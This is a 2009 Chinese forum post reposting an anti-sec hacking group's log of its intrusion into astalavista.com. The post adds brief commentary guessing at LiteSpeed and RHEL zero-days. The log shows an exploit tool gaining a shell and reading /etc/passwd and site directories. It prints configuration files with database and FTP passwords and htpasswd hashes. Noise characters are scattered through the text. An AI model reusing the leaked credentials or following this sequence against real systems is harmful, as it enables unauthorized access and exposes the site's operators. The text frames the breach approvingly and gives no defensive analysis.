里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。$ h& y: e2 b6 M
6 j9 B$ B. r; d8 \% \5 m0 _( ^
[root@front3 ~]# curl -I litespeedtech.com' z4 m2 T: N+ S% Y. L8 l/ V
HTTP/1.1 200 OK/ }0 d: V6 \( W
Date: Fri, 05 Jun 2009 22:54:51 GMT
* j1 Z* J! t6 DServer: LiteSpeed1 `) Z+ Y! H( d6 k
3 b- M5 y! y: B6 }; @" V
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-! |9 Q; @, i4 s5 e, [- h/ q
+ j4 H+ ?4 n+ |+ w4 Y2 J
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
5 C$ `" ^5 B5 G
( K0 q" t2 c8 a, m: k g& _* c6 N( s- W" F& k8 @; }6 H7 y; p+ z# g
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
. f3 r0 G$ [1 C( B7 u' }/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \4 A3 E6 ?4 E" h2 s
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \$ r+ K% p9 \$ C4 b8 z
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ // V" I, E5 ?* B
\/ \/ \/ \/ \/ \/ \/
. i- u! ]9 d# X! b5 ^. u7 p The Hacking & Security Community q5 W* V* F4 x: ?, U- n! U. U
[+] Founded in 1997 by a hacker computer enthusiast& e( Z+ @+ H7 y5 b# a* q
[-] Exposed in 2009 by anti-sec group
# g9 _+ H$ u, C7 S, A! K# x: \. b- ]- ^3 S" R k
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
+ W5 h$ e" ~5 H>> 03. Who’s behind the site?3 M% ?! L! t( c3 B2 d
>>
& c- Z) x4 F7 J' I: S8 t>> A team of security and IT professionals, and a countless number of contributors from all over the world.
" d. R7 I( F; H" B1 J
z R- D8 E7 l6 W: O5 n9 C9 Y) Z>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
% T/ V4 R+ Q- ]) J>>; t% V' a& y, s, u6 y6 J9 T* J
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and% g: ]1 z' J/ d+ B1 ]
military institutions.
) p- v0 t8 A2 B/ [ S>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
4 ~$ N$ W* ]5 w, L% O5 k1 j) R. R n4 ?! d# E' e
Why has Astalavista been targeted?
0 y9 H4 Q' K: Z( f, `3 R
w7 V: x8 f. J+ IOther than the fact that they are not doing any of this for the “community” but
9 M# e& c, y# }! Pfor the money, they spread exploits for kids, claim to be a security community+ p6 A% j/ B- C# b" O* }) ~
(with no real sense of security on their own servers), and they charge you $6.66
( q1 q" r7 Y& t0 Y" r4 ~" _7 B, vper months to access a dead forum with a directory filled with public releases( _0 `$ @' e/ a3 R
and outdated / broken services.
3 S% z8 S ?- k9 l5 K+ G
( H3 P$ N$ ~. q; D" w7 u5 c" bWe wanted to see how good that “team of security and IT professionals” really is.6 F/ A7 z& L; o' \
+ i% v) ~3 ~9 h4 `( _/ i8 s
Let’s begin.
6 ~* N1 r5 J6 e7 Y7 Q O
$ x; r2 S& L( Z+ _anti-sec:~# ./g0tshell astalavista.com -p 802 D& w3 o! @9 a0 ?1 e
[+] Connecting to astalavista.com:800 Y) _; j2 }1 D5 ?( M
[+] Grabbing banner…
' c. P: u4 t- S% [LiteSpeed
3 n3 b4 X( b) v! L' x l2 H8 E[+] Injecting shellcode…% H. ^+ g+ I' C7 _8 b3 x
[-] Wait for it
8 F( D- e! u% C4 O- x- m/ c
C+ R; C! b6 W) }- a$ C[~] We g0tshell
3 h2 \5 M( Z. Runame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- ^2 R. g4 ?. [1 Y) f5 {8 UID: uid=100(apache) gid=500(apache) groups=500(apache)4 u: \: G2 o$ W n
C ?+ U. i# u8 S* x5 o- B
sh-3.2$ cat /etc/passwd
$ ]7 l1 r7 N" r/ O" g7 ~root:x:0:0:root:/root:/bin/bash
6 R. I4 _5 b1 P; J5 u9 Obin:x:1:1:bin:/bin:/sbin/nologin
+ M; h9 M# W" {5 V$ i. \/ s0 ^* \6 Hdaemon:x:2:2:daemon:/sbin:/sbin/nologin# a( K% n, @6 o0 D' p! O
adm:x:3:4:adm:/var/adm:/sbin/nologin
3 O# `8 Z: g3 glp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ x. v1 a& N# A) T) _: Gsync:x:5:0:sync:/sbin:/bin/sync! [! G% M/ s N. u/ `8 r
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
9 p2 [5 {5 w7 o' @9 U6 k0 Qhalt:x:7:0:halt:/sbin:/sbin/halt
9 A: i! K& Y* l0 Lmail:x:8:12:mail:/var/spool/mail:/sbin/nologin$ q$ z Z1 o* O
news:x:9:13:news:/etc/news:
3 r0 z, X# M' G" O2 Euucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin! Q3 q7 o7 J+ [6 }1 x7 }
operator:x:11:0 perator:/root:/sbin/nologin; [9 u: y5 b4 S5 I T2 V# M
games:x:12:100:games:/usr/games:/sbin/nologin
7 m B' |' a8 ~0 _# Fgopher:x:13:30:gopher:/var/gopher:/sbin/nologin$ j4 q% b2 Q: w! t
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
: p2 u6 M" M" r- Z% Xnobody:x:99:99:Nobody:/:/sbin/nologin
8 X1 d% b6 H( }- Q& B- Krpm:x:37:37::/var/lib/rpm:/sbin/nologin8 S; Q$ `6 \2 w
dbus:x:81:81:System message bus:/:/sbin/nologin7 ~: S( V( ^/ ]6 y7 v; M
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
0 M6 v) K/ f, _0 U/ U5 y) v3 U: `mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin! d- w- }% T: i& Y3 M
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin/ ?$ Y$ t& M' Q7 w! A' o
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin9 q! i+ d* k+ `/ t3 [5 Z
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
; A1 D( E1 T- f+ O K% C2 \rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
3 G$ D/ A. B+ I6 p, R ~rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin8 t' {& W$ t: N+ H ^( M$ l
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
# g' H U! L& T- b! N% Rsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin% W( t( p0 f% L) E/ d2 j
pcap:x:77:77::/var/arpwatch:/sbin/nologin2 e* b6 g4 _! o3 l
named:x:25:25:Named:/var/named:/sbin/nologin
% |6 ~% {( W% q) ]$ {) _apache:x:100:500::/var/www:/bin/false+ k0 N' Z& Z6 w5 y
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
2 r: y8 _6 g& n( umysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash# w d7 m" j" `% l) E
webapps:x:500:501::/var/www/html:/bin/bash6 m1 a7 y, `! V) q: Q! {
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash" ^' B1 E! c9 _" \) c; z
admin:x:501:502::/home/admin:/bin/bash
. i" K" c! r! `% ?5 H1 x4 |) W- F0 jjon:x:502:503::/home/jon:/bin/bash
" [# A0 v. N m( x& Mcom:x:503:504::/home/com:/bin/bash
: w8 [, I6 ?" r2 ?$ n b$ V& {0 \ntp:x:38:38::/etc/ntp:/sbin/nologin+ s: @# D/ J5 I* s/ ?" U! B3 B
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin7 W$ n0 f; N6 A5 F1 ]! Y8 ~7 I! G
astanet:x:504:505::/home/astanet:/bin/bash& F$ E: x. j- Y" b* m
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
' Q. f# A" _8 a+ kavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
* }: z; }; N" F) W, a& Z% D; e- ]3 f$ D
sh-3.2$ cat /etc/hosts% O$ U, U6 ]1 v' M
# Do not remove the following line, or various programs
4 w D. v" z a# f2 x# that require network functionality will fail.
- d6 w7 [2 i1 T( _4 ^% O& N, z6 \# c127.0.0.1 localhost.localdomain localhost
/ f g% g" K% l I::1 localhost6.localdomain6 localhost6
/ a# [' U5 P( Q; }0 U) E. L80.74.154.172 asta1.astalavistaserver.com+ W" l1 i6 P+ H3 g F0 w
% n# T) B; \ d. osh-3.2$ pwd
4 O. k6 ^ G1 L5 u' Y3 T8 l; K/home/com/public_html- ~- p, G9 {. W+ N# U
1 E' \* Q m& k0 ssh-3.2$ ls -la
4 B- [( X! g' z) ~! u8 gtotal 18460' u* f/ U1 @6 K9 |* t
drwxr-xr-x 30 com apache 4096 May 28 17:06 .1 w5 R1 r& O8 `; h
drwx–x–x 11 com com 4096 Jun 25 2008 ..( A, A4 S% N% ^( w
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
7 b2 L/ b% |, D7 mdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
% G7 R0 x# X; I+ t7 W& Tdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin9 q6 ]* a& f6 R! r/ Q) c' f
drwxrwxrwx 2 com com 4096 May 19 00:50 config: J( n7 o8 U3 |. f5 b/ e/ ]
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core- b" `& q6 U0 A' \
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
) }* W3 n2 c5 ^drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing: w. Z+ d6 r" _6 E+ H8 u# j4 O
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo$ ^: ~4 ^9 {/ b q3 j% ]2 Z* f
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__. F2 O+ z Z' E8 q& d6 Q, [
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
4 ]& ~/ n' W" Y9 Z9 y+ Q) Odrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
) {. F8 R6 \- a% o. L' A3 Mdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
: c7 ~' g/ ~2 j- X6 C4 f-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
2 [. ^' z- m b1 I. @; Tdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
1 L0 N: j) h! ]( [-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
$ U9 u, y* m2 h-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak( _. Y( }0 R, b8 p" Y9 i
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
- T* L9 \# u: F, D2 w pdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
2 Q& I; r' Q5 z& D) `" c6 o0 idrwxrwxrwx 14 com com 4096 Feb 2 19:29 images/ p" g7 ]5 z, y$ w% y( F% D4 v8 n
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php2 j( w' c4 Q+ V6 D% x& d' Y+ X
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
3 U; y* ~. T; Z/ Pdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang+ ~- B' t* \, g/ v# R/ W1 U" x7 i
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
; h2 j2 P9 _7 E9 h5 s8 Pdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media, ^( ?( f% C9 d: \, {
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications+ A2 A" C" U _: w% A7 H
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
( ~9 l) G% }8 a1 q3 Q. @5 K* o7 d9 s! Fdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
% g$ w" l& y5 D- A6 C) s/ u. C; ldrwxrwxr-x 22 com com 4096 May 28 17:06 _new
4 }; [( Q$ R( c$ G7 Z; J8 z9 Adrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old/ a. p. _6 G+ J) H/ m! H: U. S( k
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy; b; _2 R& [. s$ d9 l
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy. M' r! g4 ~/ X
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
6 b: l4 V" [) k2 Q, M: X) d0 }-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
: Z0 a% g4 K7 @* S& u-rw-r–r– 1 com com 223 Mar 30 15:32 test.php( F) _6 v6 I j( m' g- D8 Z
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes/ m& q, U ~3 w" z% O
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp O1 F* ?! ]9 j0 a m+ I
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam! M9 c" u& c! k. t! d% t1 r& O
* {- x& k& i* s
sh-3.2$ head -20 index.php6 A( f \3 b- n
<?php5 J% h/ f) l$ `. Z$ e4 f. c+ Y, S
4 [+ c/ T0 Z; Q+ n5 i+ |$ y/ Y/ E/**
6 o1 Q4 O& G: A" Z' X8 m$ y* The main page for the CMS
) e z5 k4 w- N n7 q* @copyright CONTREXX CMS - COMVATION AG- Y' |1 O8 a( ]( @' @0 h& g* [
* @author Comvation Development Team
7 ?" J& |2 v9 C3 a* @version v1.0.9.10.1 stable
4 v% U8 a, I( C* v6 N* @package contrexx) L( l% s* B% u J6 I
* @subpackage core
. f# X6 H: }2 [) H& x" I* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
' R; O, m( M$ V% ? O# x* @since v0.0.0.0
: p$ T+ ]8 u6 j! @3 z/ ~* @todo Capitalize all class names in project
# L) v' C! {- y! `3 f: }+ x& N* @uses /config/configuration.php
, a. T6 B" j/ Y" \8 Y* @uses /config/settings.php e3 {( g/ |9 G3 D- w
* @uses /config/version.php+ ?& }: C6 K: \/ ^. _( C- q
* @uses /core/API.php
; @5 M$ D& f6 [* @uses /core_modules/cache/index.class.php
: H5 F7 v4 @# |# @& Z* @uses /core/error.class.php, v. }7 V0 s- J; J
* @uses /core_modules/banner/index.class.php
, R5 o5 j% `+ @% L: f$ ^* @uses /core_modules/contact/index.class.php3 A0 T' r8 m4 P, L3 k
4 C0 H) A/ n* Z" \: M8 z" e
sh-3.2$ cd config/: K1 x+ Y% ]+ O* j# h6 b
sh-3.2$ ls -la& R& H3 K* F" @' b1 z& ?2 [
total 32( L+ }: I' Y! g ?: ] m
drwxrwxrwx 2 com com 4096 May 19 00:50 .
$ j, c P( ~- J6 ^! h! K0 idrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
7 y9 s" d H7 H/ h( ^! |& Q-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php2 H8 V/ k7 y: _: f
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! }) k0 R7 q" z+ y
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php `) t+ x! H& t, _+ ^
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php. X( k1 Y& ]6 B, A
& `& P. _- R; }) csh-3.2$ cat configuration.php/ X Z# H. z' ~% r2 M
[snip]
. E% ]+ b! I- e) @/ ~% M/ c4 B# b$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost0 D7 P' M' j! T5 s' H( r
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name5 d; [, u5 B* q/ p
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix0 L% H# y/ A3 b: o0 p& t
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
! s: M0 m% T! v- S) T7 l; U' X$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password4 [* ?9 _5 [7 E8 l j+ s
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
! p; f! Q/ D1 ^* D/ b6 Z2 J/ K$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)0 F4 h0 @) b, f. x% U! X! w
[snip]5 I3 z ^. \3 |1 q& [
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
8 D! H, W1 p6 a$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode; A) G+ j ]" F* Y3 I K$ T
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost8 {0 f0 ? E) ^$ i1 e
$_FTPCONFIG['port'] = 21; // Ftp remote port
4 r; O0 C$ S8 U, I$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username. J1 U* k* t& g8 J. H
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password' s$ c; t& P& F( ~+ c5 _( K- q8 `9 B! n
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms. E) p: U0 R( @- W! n+ |0 g
; \; R- }# A/ `
sh-3.2$ cd ..
2 t* P& i5 E( c9 n$ C9 Dsh-3.2$ cd dvd/
4 U- T. u* r7 o* U+ o( ^sh-3.2$ ls -la+ u4 w3 t* |$ n" {* L( k3 N
total 2913780% L; n, B+ d7 G
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
' k$ n$ Y7 B2 S' Y7 y2 ~# Gdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..# V" q, H3 o+ v3 b( A( ^
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar$ b G. K! C L0 Q; u, p
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar# g I$ j" s8 h
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar# D9 h0 |% q( f( X4 y" w8 |
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess- `6 N' o) V" H7 m" [
4 ?9 P- z% U+ v# d5 vsh-3.2$ cat .htaccess. I. x8 |! H9 _' n- ?" b
authType Basic
. t; t# _ z5 m# vauthName DVD; H- l9 M8 ]. B) }4 `
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd/ q' _/ r+ J o
require valid-user
& A# ~. G4 }. M: k* G* {- \2 o
* p! E4 N7 @! _ ish-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd/ C" J8 X ? e
DVDdownload:CRD8cuY6.MPT6
2 ~1 g+ _5 x9 s% }5 KDVDdownload2:CR8a36.wluFMg
8 d: W/ c+ S9 C0 ]* p" `$ @8 x/ f2 X. @2 o; o1 R w
sh-3.2$ cat test.php6 O2 G9 K. V4 N. |: s% e! n/ W
<?php3 k" c1 B6 S8 I5 y
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;9 {/ g* G/ y' T" G
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));2 `5 d0 l& N/ `2 C4 k7 p/ W
echo $url;: g: u& f/ E9 e4 A* }8 _
?>' l; |0 @$ ^' W a$ |0 ^
9 t; B# i+ k+ _: @sh-3.2$ cd modifications/
8 I8 G! s0 d( }& E+ w3 ssh-3.2$ ls -la* D" W( p3 K0 Z4 C0 i3 a) O
total 324 t/ O, r2 D* _
drwxr-xr-x 8 com com 4096 May 11 12:48 .8 k1 J* c4 d% n: ]# j/ v. f+ b
drwxr-xr-x 30 com apache 4096 May 28 17:06 .. v5 ^, z+ v6 |( Z4 w
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng9 s( @5 ?3 Y; N+ }8 o5 u4 T8 a7 e
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs( a* X/ X8 D6 D5 `3 d$ H
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
7 J o" A5 D1 t8 ?! o0 k4 zdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
6 i6 j5 B( c' c' m1 ]0 a. t- Fdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search& [3 D! C, L0 [. _2 C1 ~
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp3 p; V! t9 A; t B- q
( o/ [+ H8 u( x8 Y4 B/ Z
sh-3.2$ ls -R8 f' N, _& D& L6 ~) ~; R% b
.:7 f( S; {" ?8 J3 T5 I+ n$ u
com_avtng cronjobs onlinetools pjirc search _tmp: ~6 x6 F& B1 Y! d Z
6 m5 `" M/ ?6 s y2 |2 f./com_avtng:: z5 ?- K e) s# ^
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
) ]( F6 T6 T) E3 `+ _
+ {, Q$ w( [0 ~2 C9 c6 F./com_avtng/scripts:
4 K5 H& \ i4 C5 i7 |: r8 R E: vpopunder.js
0 R) I8 U4 P9 U- }2 w3 h# N8 w' i0 X
./cronjobs:3 L# [4 N3 m& {8 [% `. L: N5 }
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp1 f q% m, x/ a* J8 t6 W* T
7 @* R) O E/ l Q$ D
./cronjobs/tmp:4 u9 l. w1 o# k& ]$ B) s- @3 V- [
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv. T X p; j5 W- P7 `. z
N; f7 `. V& q4 w./onlinetools:% Q- L: \% A5 Q3 ~9 L
index.php
' ~2 P4 Q3 B$ v/ d5 y- D1 ^& H
( G/ |$ z5 _% y5 c) h% Z" e2 Y./pjirc:$ ]. \$ j0 ]/ E$ m2 C" I
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
1 F( j4 v% F! j2 |& G: @) t& w9 O. L$ dAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt6 m( ]% T* j6 t* g4 F8 C$ G u
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd' k" y& q* q# V
) r* Y' u) C$ z% {* s
./pjirc/img:6 x0 ~. V/ j; \; `
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
: j) U) t7 w4 w% w& Varbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 6 |8 d7 B/ g8 z
verre-eau.gif# j$ O ~' q! @7 s
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
5 c* U5 X! Q; f( m* r* ` L; S Sverre-vin.gif
4 l; Y8 ]8 \2 V x- uballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
6 T! P! T% p+ J- vbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
6 `+ h/ _0 b2 l, P4 f' l0 X1 h$ N8 X
./pjirc/snd:
0 ^" X$ P5 t8 Nbell2.au ding.au \7 j. c* Y+ }( Y3 Y- a% R H* A
) f& c! c. N" d4 A' c$ N2 z& w./search:
% H6 ]( _2 ]" D* Z# @searchEngines.php search.php) f2 l( o- {2 X F1 \ l/ p
1 F9 t3 k6 z M./_tmp:9 s4 ^ M* ~: @( p: x: o
defaultPorts.php defaultPorts.txt+ f& x! g: J* g4 z# L, w
# R: |" A5 o- f4 g% m1 V
sh-3.2$ cd cronjobs/& l# P7 q- L( O( r3 I0 P4 ]& @; n
sh-3.2$ cat exploits.php
4 h" n$ g6 ^ ?) M- ? _7 J[snip]- F/ q; i* _' s
$categories = array();9 _3 g( R, o( o9 i5 y, P) h3 \2 I2 W
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;& b2 { t' X+ Q
$expolits = file($milw0rmFile);4 G7 Z6 J" ?/ w
$comExploits = array();
+ ^! m) e1 d& ^2 m0 z- o[snip]0 e. u4 A) t1 v9 {# ?6 Z4 _2 r5 R
// manage data
( b# _' v# l* K- d6 Jfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ }, L& Q5 U: v' p2 o
) ?( y+ x/ `" V$ z0 K; \. k, z1 ~ // get path and title& H% I) n' Z; c, e6 @
$expolits[$x] = trim($expolits[$x]);& l2 J" I7 ?) f. |2 a% O
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
$ V# g# v3 p. ]; E9 l( b& l5 C $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
$ z7 M( c6 y' }. D8 F% b( b1 I: N# \ t1 i N0 b2 ?+ L' e
// check if file exists8 {1 ]8 p. C% N A
if (file_exists($path)) {6 ~( N/ }% A9 a3 i0 I) o
/ }' P, G# I) U2 i# y6 N% m $text = file_get_contents($path);0 S1 ?$ @1 x! F5 b% S' ]. _' C
. G8 ?/ d$ I; j% s8 G# I m u
// get content and date0 x; |9 O0 W6 D7 H5 |( P) @! r0 ^
//$text = htmlspecialchars($text, ENT_QUOTES);6 K$ q# l- |* E1 M! O
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
9 U$ j8 U$ ?* R, A0 e5 D+ v if ($tmptext != ”) {
+ I `. _, Z" U# x $text = $tmptext;, m* e3 A( N, t* Z/ N9 C
} else {
0 b$ \, o" U- j. |2 G" R1 d3 ~( X! Z $text = addslashes(htmlentities($text, ENT_QUOTES));: Z, r4 `' m6 @# j/ @- r$ \
}
, z4 a. h6 ^2 M. e6 V) H $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));0 d( G. ]0 u# F6 r1 ^
$tmp = explode('-', $date);
/ G) h+ x/ H! ]* ]6 b5 @ $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
6 A- T6 e, A1 V% K9 a' Z+ t $cat = getCategory ($path);0 s. w. H3 v* o' l- F% h
$ext = pathinfo(basename($path));7 X4 [6 |$ H" ] H. l* h3 Q
$ext = $ext['extension'];
, q% G0 ^) R% |0 d8 P+ Y) T3 K $qStr = ”
( ^( k4 m4 K6 C SELECT `id`
* E3 s. z/ `4 z1 a3 ]5 S FROM `contrexx_module_exploits`9 g5 b( a3 |+ r( [: Z
WHERE `title` = ‘” . $title . “‘/ q: j+ \7 `! Q5 l7 f# P$ ]' ^" c
AND `date` = ‘” . $date . “‘
; s% H$ g3 s! C" Q0 o “;, y/ a. \5 k1 K- o# r$ `
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;- [* k) T) ]4 u
$q = $_objDB->query($qStr);% l# b. j* @% U! n
2 n' J% q$ H: L
if ($q->numRows() == 0) {
H3 i: U/ K' y9 Z, D' \! W; ^& r( B8 H3 ?9 @% z, j
// prepare array
; j* @+ S# j6 S' ?! \: V' W $comExploits[$x]['date'] = $date;9 n& |9 \. \! B0 R7 J# u
$comExploits[$x]['title'] = $title;1 W: i) L. }- B8 K0 S' I4 j
$comExploits[$x]['author'] = ‘milw0rm’;) [& y2 \# }* Z( @, t
$comExploits[$x]['text'] = $text;
! q* [' B3 W7 p& o, V: e0 F $comExploits[$x]['source'] = $ext;
9 s0 {" X- y% Q: G' F1 u $comExploits[$x]['url1'] = ”;
8 S7 I7 C/ D# |# y. K3 Y $comExploits[$x]['url2'] = ”;% l5 d2 F: V3 R' X$ x( D4 Y" {0 K
$comExploits[$x]['catid'] = $cat;
: G$ b3 w: |( S. i `6 J $comExploits[$x]['lang'] = ‘2′;5 Y' a" E$ o' j% S6 E
$comExploits[$x]['userid'] = ‘12′;" h$ [ ]% r. i. g5 X
$comExploits[$x]['startdate'] = ‘0000-00-00′;1 F3 T" Z$ ?0 O* J* f; n: D
$comExploits[$x]['enddate'] = ‘0000-00-00′;
% f% v( i' h9 G9 ?! y& y5 R $comExploits[$x]['status'] = ‘1′;' h% \3 C& {' l( j
$comExploits[$x]['changelog'] = $date;1 |' W$ E3 H, y3 l0 C( A0 d6 h
) z/ O O2 y: @8 Z1 ~( K: G% A }
1 s! Z5 e, V# q0 o0 D& S[snip]- n! P& E2 m( _( C% \* W7 ?
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
( Y/ ]& t' P" C# F& \<rss version=”2.0″>
5 g2 w" W0 ?4 l <channel>( Q% l) M3 N4 P0 ?9 Z
<title>ASTALAVISTA.com - Exploits</title>
